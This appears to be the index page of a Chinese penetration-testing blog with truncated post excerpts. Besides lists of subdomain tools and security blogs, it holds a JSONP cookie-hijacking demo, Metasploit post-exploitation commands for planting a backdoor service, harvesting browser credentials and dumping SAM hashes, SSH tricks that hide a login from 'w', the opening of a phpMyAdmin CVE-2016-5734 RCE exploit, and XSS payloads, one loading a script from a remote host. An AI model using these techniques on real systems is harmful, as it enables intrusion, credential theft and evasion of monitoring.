安全行业从业人员自研开源扫描器合集

2017年1月3日系统自定义小折腾/小配置

子域名枚举类 https://github.com/lijiejie/subDomainsBrute (经典的子域名爆破枚举脚本) https://github.com/ring04h/wydomain (子域名字典穷举) https://github.com/le4f/dnsmaper (子域名枚举与地图标记) https://github.com/0xbug/orangescan (在线子域名信息收集工具) https://github.com/TheRook/subbrute （根据DNS记录查询子域名) https://github.com/We5ter/GoogleSSLdomainFinder (基于谷歌SSL透明证书的子域名查询脚本) https://github.com/mandatoryprogrammer/cloudflare_enum （使用CloudFlare进行子 […]

查看全部

jsonp跨域劫持姿势

2017年1月3日2017年1月3日系统自定义 Web安全与渗透

利用场景: 对于本域的某接口要回调外域的参数时,对回调的referer值无任何校验.方可利用. 例如: http://xxx.xxxx.xxxx/index?callback=http://xxx.xxx.xxx&xxx=1 有callback参数未做校验,那么,可以用来做个jsonp跨域劫持Cookie. Demo: <html> <script> function test(json){ alert(JSON.stringify(json)) } </script> <script src=”http://xxx.xxxx.xxxx/index?callback=test&xxx=1″></script> </html>

查看全部

msf 常用渗透模块—-POST

2017年1月1日2018年11月26日系统自定义 Web安全与渗透

创建服务作为后门 meterpreter > run metsvc 查看目标主机的内网IP段情况 meterpreter > run get_local_subnets 添加路由表和对应的session route add 192.168.1.0 255.255.255.0 1 查看路由表 route print 读取目标主机IE浏览器cookies等缓存信息，嗅探目标主机登录过的各类账号密码 meterpreter > run post/windows/gather/enum_ie 获取目标主机上最近访问过的文档、链接信息 meterpreter > run post/windows/gather/dumplinks 在获得system权限的情况下，使用hashdump命令可以到处目标主机的SAM文件，获取目标主机的账号密码hash信息，剩下的可以用爆破软件算出明 […]

查看全部

linux隐身登录技巧

2016年12月29日2016年12月29日系统自定义 Web安全与渗透

方法1：隐藏的远程登录(w 看不到) ssh -T user @ host 登录后执行： /bin/bash -i 然后就可以执行bash命令了，执行w看，登录是空的。方法2：隐藏的远程登录(w 看不到) ssh -o UserKnownHostsFile=/dev/null -T user @ host 登录后执行： /bin/bash -if 然后就可以执行bash命令了，执行w看，登录依旧是空的。

查看全部

PhpMyAdmin 4.6.2后台命令执行Exp（cve-2016-5734）

2016年12月29日2021年2月22日系统自定义 CVE漏洞复现

cve-2016-5734利用EXP说明：登录PhpMyadmin后可以直接执行命令，提权。 CODE： #!/usr/bin/env python “””cve-2016-5734.py: PhpMyAdmin 4.3.0 – 4.6.2 authorized user RCE exploit Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7. CVE: CVE-2016-5734 Author: https://twitter.com/iamsecurity run: ./cve-2016-5734.py -u root –pwd=”” http://localhost/pma -c “system(‘ls -lua’ […]

查看全部

XSS Playload 集合

2016年12月28日2017年3月16日系统自定义 Web安全与渗透

更新时间：2017年03月16日 javascript:s=document.createElement(‘script’);s.src=’http://www.xxx.com/xss.js’;document.body.appendChild(s) 更新时间：2017年03月01日 <embed src=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPS […]

查看全部

互联网安全Blog Top30

2016年12月28日系统自定义小折腾/小配置

1、We Live Security 地址：http://www.welivesecurity.com/ 简介：主要研究网络威胁和恶意软件。文章更新频率：9篇/周 2、Intel Security | McAfee Blogs 地址：https://securingtomorrow.mcafee.com/ 简介：麦咖啡的安全博客。文章更新频率：88篇/周 3、Krebs on Security 地址：http://krebsonsecurity.com/ 简介：Brian Kerbs的个人博客，致力于调查网络犯罪和计算机安全。文章更新频率：4篇/周 4、Dark Reading 地址：http://www.darkreading.com/ 简介：Dark Reading提供了网络安全热点新闻和攻击，漏洞攻击分析，以及企业数据的保护策略。文章更新频率：29篇/周 5、Schneier […]

查看全部